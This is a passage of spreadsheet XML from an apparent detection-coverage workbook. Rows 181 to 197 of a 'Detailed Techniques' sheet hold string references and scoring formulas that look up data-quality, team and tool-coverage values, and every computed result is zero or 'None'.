        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F181&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F181))-LEN(SUBSTITUTE(TRIM(F181),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I181" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F181&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F181))-LEN(SUBSTITUTE(TRIM(F181),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J181" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F181&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F181))-LEN(SUBSTITUTE(TRIM(F181),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K181" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="182" spans="1:11" ht="313.5" x14ac:dyDescent="0.45">
      <c r="A182" s="8" t="s">
        <v>187</v>
      </c>
      <c r="B182" s="8" t="s">
        <v>985</v>
      </c>
      <c r="C182" s="25" t="s">
        <v>986</v>
      </c>
      <c r="D182" s="10" t="s">
        <v>987</v>
      </c>
      <c r="E182" s="10" t="s">
        <v>988</v>
      </c>
      <c r="F182" s="10" t="s">
        <v>989</v>
      </c>
      <c r="G182" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K182,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H182" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F182&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F182))-LEN(SUBSTITUTE(TRIM(F182),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I182" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F182&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F182))-LEN(SUBSTITUTE(TRIM(F182),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J182" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F182&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F182))-LEN(SUBSTITUTE(TRIM(F182),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K182" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="183" spans="1:11" ht="270.75" x14ac:dyDescent="0.45">
      <c r="A183" s="8" t="s">
        <v>189</v>
      </c>
      <c r="B183" s="8" t="s">
        <v>990</v>
      </c>
      <c r="C183" s="25" t="s">
        <v>991</v>
      </c>
      <c r="D183" s="10" t="s">
        <v>992</v>
      </c>
      <c r="E183" s="10" t="s">
        <v>993</v>
      </c>
      <c r="F183" s="10" t="s">
        <v>994</v>
      </c>
      <c r="G183" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K183,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H183" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F183&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F183))-LEN(SUBSTITUTE(TRIM(F183),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I183" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F183&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F183))-LEN(SUBSTITUTE(TRIM(F183),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J183" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F183&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F183))-LEN(SUBSTITUTE(TRIM(F183),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K183" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="184" spans="1:11" ht="285" x14ac:dyDescent="0.45">
      <c r="A184" s="8" t="s">
        <v>192</v>
      </c>
      <c r="B184" s="8" t="s">
        <v>995</v>
      </c>
      <c r="C184" s="25" t="s">
        <v>996</v>
      </c>
      <c r="D184" s="10" t="s">
        <v>997</v>
      </c>
      <c r="E184" s="10" t="s">
        <v>998</v>
      </c>
      <c r="F184" s="10" t="s">
        <v>999</v>
      </c>
      <c r="G184" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K184,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H184" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F184&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F184))-LEN(SUBSTITUTE(TRIM(F184),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I184" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F184&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F184))-LEN(SUBSTITUTE(TRIM(F184),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J184" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F184&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F184))-LEN(SUBSTITUTE(TRIM(F184),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K184" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="185" spans="1:11" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A185" s="8" t="s">
        <v>152</v>
      </c>
      <c r="B185" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C185" s="25" t="s">
        <v>1000</v>
      </c>
      <c r="D185" s="10" t="s">
        <v>1001</v>
      </c>
      <c r="E185" s="10" t="s">
        <v>1002</v>
      </c>
      <c r="F185" s="10" t="s">
        <v>1003</v>
      </c>
      <c r="G185" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K185,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H185" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F185&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F185))-LEN(SUBSTITUTE(TRIM(F185),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I185" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F185&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F185))-LEN(SUBSTITUTE(TRIM(F185),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J185" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F185&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F185))-LEN(SUBSTITUTE(TRIM(F185),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K185" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:11" ht="270.75" x14ac:dyDescent="0.45">
      <c r="A186" s="8" t="s">
        <v>118</v>
      </c>
      <c r="B186" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C186" s="25" t="s">
        <v>1004</v>
      </c>
      <c r="D186" s="10" t="s">
        <v>1005</v>
      </c>
      <c r="E186" s="10" t="s">
        <v>1006</v>
      </c>
      <c r="F186" s="10" t="s">
        <v>1007</v>
      </c>
      <c r="G186" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K186,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H186" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F186&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F186))-LEN(SUBSTITUTE(TRIM(F186),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I186" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F186&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F186))-LEN(SUBSTITUTE(TRIM(F186),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J186" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F186&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F186))-LEN(SUBSTITUTE(TRIM(F186),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K186" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="187" spans="1:11" ht="384.75" x14ac:dyDescent="0.45">
      <c r="A187" s="8" t="s">
        <v>221</v>
      </c>
      <c r="B187" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C187" s="25" t="s">
        <v>1008</v>
      </c>
      <c r="D187" s="10" t="s">
        <v>1009</v>
      </c>
      <c r="E187" s="10" t="s">
        <v>1010</v>
      </c>
      <c r="F187" s="10" t="s">
        <v>1011</v>
      </c>
      <c r="G187" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K187,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H187" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F187&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F187))-LEN(SUBSTITUTE(TRIM(F187),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I187" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F187&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F187))-LEN(SUBSTITUTE(TRIM(F187),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J187" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F187&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F187))-LEN(SUBSTITUTE(TRIM(F187),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K187" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="188" spans="1:11" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A188" s="8" t="s">
        <v>157</v>
      </c>
      <c r="B188" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C188" s="25" t="s">
        <v>1012</v>
      </c>
      <c r="D188" s="10" t="s">
        <v>1013</v>
      </c>
      <c r="E188" s="10" t="s">
        <v>1014</v>
      </c>
      <c r="F188" s="10" t="s">
        <v>1015</v>
      </c>
      <c r="G188" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K188,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H188" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F188&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F188))-LEN(SUBSTITUTE(TRIM(F188),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I188" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F188&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F188))-LEN(SUBSTITUTE(TRIM(F188),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J188" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F188&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F188))-LEN(SUBSTITUTE(TRIM(F188),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K188" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="189" spans="1:11" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A189" s="8" t="s">
        <v>166</v>
      </c>
      <c r="B189" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C189" s="25" t="s">
        <v>1016</v>
      </c>
      <c r="D189" s="10" t="s">
        <v>1017</v>
      </c>
      <c r="E189" s="10" t="s">
        <v>1018</v>
      </c>
      <c r="F189" s="10" t="s">
        <v>1019</v>
      </c>
      <c r="G189" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K189,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H189" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F189&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F189))-LEN(SUBSTITUTE(TRIM(F189),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I189" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F189&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F189))-LEN(SUBSTITUTE(TRIM(F189),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J189" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F189&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F189))-LEN(SUBSTITUTE(TRIM(F189),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K189" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="190" spans="1:11" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A190" s="8" t="s">
        <v>19</v>
      </c>
      <c r="B190" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C190" s="25" t="s">
        <v>1020</v>
      </c>
      <c r="D190" s="10" t="s">
        <v>1021</v>
      </c>
      <c r="E190" s="10" t="s">
        <v>1022</v>
      </c>
      <c r="F190" s="10" t="s">
        <v>1023</v>
      </c>
      <c r="G190" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K190,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H190" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F190&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F190))-LEN(SUBSTITUTE(TRIM(F190),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I190" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F190&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F190))-LEN(SUBSTITUTE(TRIM(F190),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J190" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F190&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F190))-LEN(SUBSTITUTE(TRIM(F190),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K190" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="191" spans="1:11" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A191" s="8" t="s">
        <v>29</v>
      </c>
      <c r="B191" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C191" s="25" t="s">
        <v>1024</v>
      </c>
      <c r="D191" s="10" t="s">
        <v>1025</v>
      </c>
      <c r="E191" s="10" t="s">
        <v>1026</v>
      </c>
      <c r="F191" s="10" t="s">
        <v>1027</v>
      </c>
      <c r="G191" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K191,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H191" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F191&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F191))-LEN(SUBSTITUTE(TRIM(F191),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I191" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F191&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F191))-LEN(SUBSTITUTE(TRIM(F191),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J191" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F191&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F191))-LEN(SUBSTITUTE(TRIM(F191),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K191" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="192" spans="1:11" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A192" s="8" t="s">
        <v>194</v>
      </c>
      <c r="B192" s="8" t="s">
        <v>939</v>
      </c>
      <c r="C192" s="25" t="s">
        <v>1028</v>
      </c>
      <c r="D192" s="10" t="s">
        <v>1029</v>
      </c>
      <c r="E192" s="10" t="s">
        <v>1030</v>
      </c>
      <c r="F192" s="10" t="s">
        <v>1031</v>
      </c>
      <c r="G192" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K192,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H192" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F192&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F192))-LEN(SUBSTITUTE(TRIM(F192),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I192" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F192&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F192))-LEN(SUBSTITUTE(TRIM(F192),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J192" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F192&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F192))-LEN(SUBSTITUTE(TRIM(F192),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K192" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="193" spans="1:11" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A193" s="8" t="s">
        <v>39</v>
      </c>
      <c r="B193" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C193" s="25" t="s">
        <v>1032</v>
      </c>
      <c r="D193" s="10" t="s">
        <v>1033</v>
      </c>
      <c r="E193" s="10" t="s">
        <v>1034</v>
      </c>
      <c r="F193" s="10" t="s">
        <v>1035</v>
      </c>
      <c r="G193" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K193,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H193" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F193&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F193))-LEN(SUBSTITUTE(TRIM(F193),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I193" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F193&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F193))-LEN(SUBSTITUTE(TRIM(F193),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J193" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F193&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F193))-LEN(SUBSTITUTE(TRIM(F193),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K193" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="194" spans="1:11" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A194" s="8" t="s">
        <v>48</v>
      </c>
      <c r="B194" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C194" s="25" t="s">
        <v>1036</v>
      </c>
      <c r="D194" s="10" t="s">
        <v>1037</v>
      </c>
      <c r="E194" s="10" t="s">
        <v>1038</v>
      </c>
      <c r="F194" s="10" t="s">
        <v>1039</v>
      </c>
      <c r="G194" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K194,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H194" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F194&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F194))-LEN(SUBSTITUTE(TRIM(F194),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I194" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F194&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F194))-LEN(SUBSTITUTE(TRIM(F194),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J194" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F194&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F194))-LEN(SUBSTITUTE(TRIM(F194),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K194" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="195" spans="1:11" ht="285" x14ac:dyDescent="0.45">
      <c r="A195" s="8" t="s">
        <v>58</v>
      </c>
      <c r="B195" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C195" s="25" t="s">
        <v>1040</v>
      </c>
      <c r="D195" s="10" t="s">
        <v>1041</v>
      </c>
      <c r="E195" s="10" t="s">
        <v>1042</v>
      </c>
      <c r="F195" s="10" t="s">
        <v>1043</v>
      </c>
      <c r="G195" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K195,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H195" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F195&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F195))-LEN(SUBSTITUTE(TRIM(F195),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I195" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F195&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F195))-LEN(SUBSTITUTE(TRIM(F195),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J195" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F195&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F195))-LEN(SUBSTITUTE(TRIM(F195),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K195" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="196" spans="1:11" ht="270.75" x14ac:dyDescent="0.45">
      <c r="A196" s="8" t="s">
        <v>69</v>
      </c>
      <c r="B196" s="8" t="s">
        <v>10</v>
      </c>
      <c r="C196" s="25" t="s">
        <v>1044</v>
      </c>
      <c r="D196" s="10" t="s">
        <v>1045</v>
      </c>
      <c r="E196" s="10" t="s">
        <v>1046</v>
      </c>
      <c r="F196" s="10" t="s">
        <v>1047</v>
      </c>
      <c r="G196" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K196,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H196" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F196&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F196))-LEN(SUBSTITUTE(TRIM(F196),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I196" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F196&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F196))-LEN(SUBSTITUTE(TRIM(F196),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J196" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F196&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F196))-LEN(SUBSTITUTE(TRIM(F196),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K196" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="197" spans="1:11" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A197" s="8" t="s">
        <v>197</v>
      </c>
      <c r="B197" s="8" t="s">
        <v>939</v>
      </c>
      <c r="C197" s="25" t="s">
        <v>1048</v>
      </c>
      <c r="D197" s="10" t="s">
        <v>1049</v>
      </c>
      <c r="E197" s="10" t="s">
        <v>1050</v>
      </c>
      <c r="F197" s="10" t="s">
        <v>1051</v>
      </c>
      <c r="G197" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K197,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H197" s="51">
